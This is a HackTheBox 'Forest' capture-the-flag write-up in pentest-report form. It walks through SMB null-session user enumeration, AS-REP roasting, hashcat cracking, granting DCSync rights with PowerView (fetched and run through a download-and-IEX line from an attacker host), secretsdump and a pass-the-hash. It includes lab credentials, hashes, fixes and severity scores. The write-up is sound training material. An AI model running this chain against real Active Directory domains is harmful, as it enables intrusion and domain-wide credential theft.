HTB Forest

Summary

Forest is an easy rated retired box on HTB focused on active directory attacks. SMB permitted null session logons, which enables us to gain a list of users on the host. This allows us to perform an AS-REP roast brute force attack, which grants us initial access. Using this account, we are able to create an account in the Exchange Windows Permissions group and then grant it DCSync rights. This is then used to retrieve the DC Admin's NTLM hash, which is then passed and used to gain elevted privileges.

Service Enumeration

port protocol version notes
53/tcp DNS Simple DNS Plus
88/tcp Kerberos Microsoft Windows Kerberos
389/tcp LDAP Microsoft Windows Active Directory LDAP Domain: htb.local
445/tcp SMB Windows Server 2016 Standard workgroup: HTB

Note: Kerberos + LDAP + DNS likely indicates Active Directory Domain Controller.

Nmap Scan results


Nmap scan report for 10.129.97.129
Host is up, received user-set (0.049s latency).
Scanned at 2023-09-30 14:36:17 UTC for 22s
Not shown: 989 closed tcp ports (reset)
PORT     STATE SERVICE      REASON          VERSION
53/tcp   open  domain       syn-ack ttl 127 Simple DNS Plus
88/tcp   open  kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2023-09-30 14:43:14Z)
135/tcp  open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
139/tcp  open  netbios-ssn  syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp  open  ldap         syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds syn-ack ttl 127 Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp  open  kpasswd5?    syn-ack ttl 127
593/tcp  open  ncacn_http   syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped   syn-ack ttl 127
3268/tcp open  ldap         syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped   syn-ack ttl 127
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h26m51s, deviation: 4h02m32s, median: 6m49s
| smb2-time: 
|   date: 2023-09-30T14:43:18
|_  start_date: 2023-09-30T14:41:18
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode: 
|   311: 
|_    Message signing enabled and required
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 25163/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 21357/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 47088/udp): CLEAN (Timeout)
|   Check 4 (port 14646/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: FOREST
|   NetBIOS computer name: FOREST\x00
|   Domain name: htb.local
|   Forest name: htb.local
|   FQDN: FOREST.htb.local
|_  System time: 2023-09-30T07:43:22-07:00


The initial Nmap scan revealed a combination of DNS + Kerberos + LDAP, which appeared to indicate that this machine was an Active Directory Domain Controller.

Accordingly, username enumeration was undertaken upon the various other protocols discovered, beginning with SMB. This was performed using Crackmapexec:


└─$ crackmapexec smb 10.129.97.129 -u '' -p '' --users
SMB         10.129.97.129   445    FOREST           [*] Windows Server 2016 Standard 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True)
SMB         10.129.97.129   445    FOREST           [+] htb.local\: 
SMB         10.129.97.129   445    FOREST           [-] Error enumerating domain users using dc ip 10.129.97.129: NTLM needs domain\username and a password
SMB         10.129.97.129   445    FOREST           [*] Trying with SAMRPC protocol
SMB         10.129.97.129   445    FOREST           [+] Enumerated domain user(s)
SMB         10.129.97.129   445    FOREST           htb.local\Administrator                  Built-in account for administering the computer/domain
SMB         10.129.97.129   445    FOREST           htb.local\Guest                          Built-in account for guest access to the computer/domain
SMB         10.129.97.129   445    FOREST           htb.local\krbtgt                         Key Distribution Center Service Account
SMB         10.129.97.129   445    FOREST           htb.local\DefaultAccount                 A user account managed by the system.
SMB         10.129.97.129   445    FOREST           htb.local\$331000-VK4ADACQNUCA           
SMB         10.129.97.129   445    FOREST           htb.local\SM_2c8eef0a09b545acb           
SMB         10.129.97.129   445    FOREST           htb.local\SM_ca8c2ed5bdab4dc9b           
SMB         10.129.97.129   445    FOREST           htb.local\SM_75a538d3025e4db9a           
SMB         10.129.97.129   445    FOREST           htb.local\SM_681f53d4942840e18           
SMB         10.129.97.129   445    FOREST           htb.local\SM_1b41c9286325456bb           
SMB         10.129.97.129   445    FOREST           htb.local\SM_9b69f1b9d2cc45549           
SMB         10.129.97.129   445    FOREST           htb.local\SM_7c96b981967141ebb           
SMB         10.129.97.129   445    FOREST           htb.local\SM_c75ee099d0a64c91b           
SMB         10.129.97.129   445    FOREST           htb.local\SM_1ffab36a2f5f479cb           
SMB         10.129.97.129   445    FOREST           htb.local\HealthMailboxc3d7722           
SMB         10.129.97.129   445    FOREST           htb.local\HealthMailboxfc9daad           
SMB         10.129.97.129   445    FOREST           htb.local\HealthMailboxc0a90c9           
SMB         10.129.97.129   445    FOREST           htb.local\HealthMailbox670628e           
SMB         10.129.97.129   445    FOREST           htb.local\HealthMailbox968e74d           
SMB         10.129.97.129   445    FOREST           htb.local\HealthMailbox6ded678           
SMB         10.129.97.129   445    FOREST           htb.local\HealthMailbox83d6781           
SMB         10.129.97.129   445    FOREST           htb.local\HealthMailboxfd87238           
SMB         10.129.97.129   445    FOREST           htb.local\HealthMailboxb01ac64           
SMB         10.129.97.129   445    FOREST           htb.local\HealthMailbox7108a4e           
SMB         10.129.97.129   445    FOREST           htb.local\HealthMailbox0659cc1           
SMB         10.129.97.129   445    FOREST           htb.local\sebastien                      
SMB         10.129.97.129   445    FOREST           htb.local\lucinda                        
SMB         10.129.97.129   445    FOREST           htb.local\svc-alfresco                   
SMB         10.129.97.129   445    FOREST           htb.local\andy                           
SMB         10.129.97.129   445    FOREST           htb.local\mark                           
SMB         10.129.97.129   445    FOREST           htb.local\santi                          

This output was saved to a file called users.txt, and was piped through a basic BASH sequence:


└─$ cat users.txt | cut -d '\' -f 2 | grep -v "Health" | grep -v "SM_" | grep -v '\$' | cut -d " " -f 1 | grep -v "SMB" | grep -v ':' | grep -v "username" > userlist.txt

This yielded:


Administrator
Guest
krbtgt
DefaultAccount
sebastien
lucinda
svc-alfresco
andy
mark
santi

After retrieving a valid username list, crackmapexec was then used to perform an AS-REP roasting attack, successfully retrieving the hashes for svc-alfresco:


└─$ crackmapexec ldap -dc-ip 10.129.97.129 -u userlist.txt -p '' --asreproast asrep_hashes.txt
SMB         10.129.97.129   445    FOREST           [*] Windows Server 2016 Standard 14393 x64 (name:FOREST) (domain:c-ip) (signing:True) (SMBv1:True)
LDAP        10.129.97.129   445    FOREST           $krb5asrep$23$svc-alfresco@HTB.LOCAL:d28eeca1f5485edfe56db9007bae6338$2a3bd48c703349104c02e49b63d5ba6bf53b45aba6fc7695cc856273a5eff3372c5a20dde225168c98bfdd0719590cebf9e15ee46fddbb8109843db53ea72d80c508abb8f58c8f486bd7938bd9e79eecbfe21c34d5ed495c3dc0a1bc86d20bf74022adeca2b59ad76d5c11a8e0de1846a2b5a790d4e4a76128d3d34902345ac6f43a7f04f94d85437c985b9f98d38bdec566484986902eac0d8731f6659fca0767e03d8c641cb2fa60caaf8578f0321aacf31b5fcea530a0b13b4da7d93e94257592396b7c749c8dde7fb5b6f042df52164c1c3b67f981b018c9c27217ddc5b62e470208f3ce

After retrieving the hash, Hashcat was utilized with the rockyou wordlist in order to perform an offline crack:


└─$ hashcat -m 18200 asrep_hashes.txt /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt

This successfully returned the password s3rvice.

This was then used to logon as svc-alfresco over winrm using crackmapexec.


└─$ crackmapexec winrm -dc-ip 10.129.97.129 -u svc-alfresco -p s3rvice

Vulnerability Explanation

Leaving SMB available with anonymous/null logon allows for username information to be leaked to attackers. This includes service account names that may be vulnerable and difficult to enumerate through OSINT sources.

Vulnerability Fix

Ensure that SMB requires proper authentication for access.

Severity

Assessed CVSS 3.1: 5.1 MEDIUM

AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L/E:X/RL:O/RC:X/CR:M/IR:X/AR:X/MAV:N/MAC:L/MPR:N/MUI:N/MS:U/MC:L/MI:N/MA:N

Proof Of Concept Code

Issue was caused by misconfiguration; no exploit needed.

Vulnerability Explanation

When accounts are configured using no Kerberos pre-authentication, an attack called an AS-REP roast becomes possible, which can be used to retrieve an account's hashes.

Vulnerability Fix

Per Alfresco's documentation disabling pre-authentication is necessary for functionality. Accordingly, it cannot be suggested to enable pre-authentication. However, please consider:

  • Ensure that svc-alfresco uses a very strong password (greater than 12 character's length, using all alphanumeric characters and symbols) that has been confirmed to not have been leaked.

As a monitoring option, honeypot accounts can be setup that do not require pre-authentication. These can then be monitored for winlog 4768 events. If these event logs are detected for the honeypot accounts (which should not ever be accessed), it can be assumed that an attacker has brute-forced all accounts on the network. This can be used to engage the SOC for initiating an incident response plan.

Severity

Assessed CVSS 3.1: 5.8 MEDIUM

AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N

Proof Of Concept Code

Issue resulted from configuration issues; no exploit code used.

Proof Screenshot

Proof Text

b6a5893ec7a691208692b70ad2eff351

Privilege Escalation

Upon gaining access to valid credentials on the domain, Bloodhound-python was utilized in order to ingest domain information.


└─$ bloodhound-python -u svc-alfresco -p s3rvice --zip -d HTB.LOCAL -ns 10.129.97.129

The information returned was then imported into Bloodhound and examined.

Our owned account, svc-alfresco was determined to be in the Account Operator's group, which enabled the creation of an account in the Exchange Windows Permissions group. This group, in turn, has the WriteDACL permission, which can be used to add DCSync rights to the account.

Creating our malicious account:


net user aquantis 12345qwerty /add /domain

net group "Exchange Windows Permissions" aquantis /add

net localgroup "Remote Management Users" aquantis /add

Powerview.ps1 was then brought aboard the remote host over http using a combination of python's http server module and certutil on the remote host. The powerview module was then loaded and used to add DCSync rights to the Aquantis account.


(New-Object System.Net.WebClient).DownloadString('http://10.10.14.53:8000/powerview.ps1') | IEX
$SecPass = ConvertTo-SecureString '12345qwerty' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('htb.local\aquantis', $SecPass)
Add-ObjectACL -PrincipalIdentity aquantis -Credential $Cred -Rights DCSync

Once aquantis had been granted the correct permissions, a DCSync attack was performed:


└─$ impacket-secretsdump -just-dc aquantis:12345qwerty@10.129.97.129 -outputfile dcsync_hashes

This resulted in all hashes for the domain being returned, including the DC Administrator's NTLM hash:


htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::

This was then used in a pass the hash attack to remotely run commands with elevated privileges on the domain controller:


crackmapexec smb 10.129.97.129 -u Administrator -H 32693b11e6aa90eb43d32c72a07ceea6 -d htb.local -x "type C:\Users\Administrator\Desktop\root.txt"

Vulnerability Explanation

DCSync is a feature of active directory intended to allow Domain Controller machine accounts to replicate domain information between multiple domain controllers in an Active Directory deployment.

Any account that has DCSync rights is thus able to retrieve any password hash on the domain, including the domain administrator's.

Vulnerability Fix

Consider auditing domain rights to ensure high risk accounts do not have DCSync, WriteDACL or Generic All rights.

Severity

Assessed CVSS 3.1: 7.6 HIGH

AV:A/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H

Proof Of Concept Code

Issue is caused by configuration settings; no exploit code needed.

Proof Screenshot

Proof Text

92927acd0ceb4e58131da3ed03276734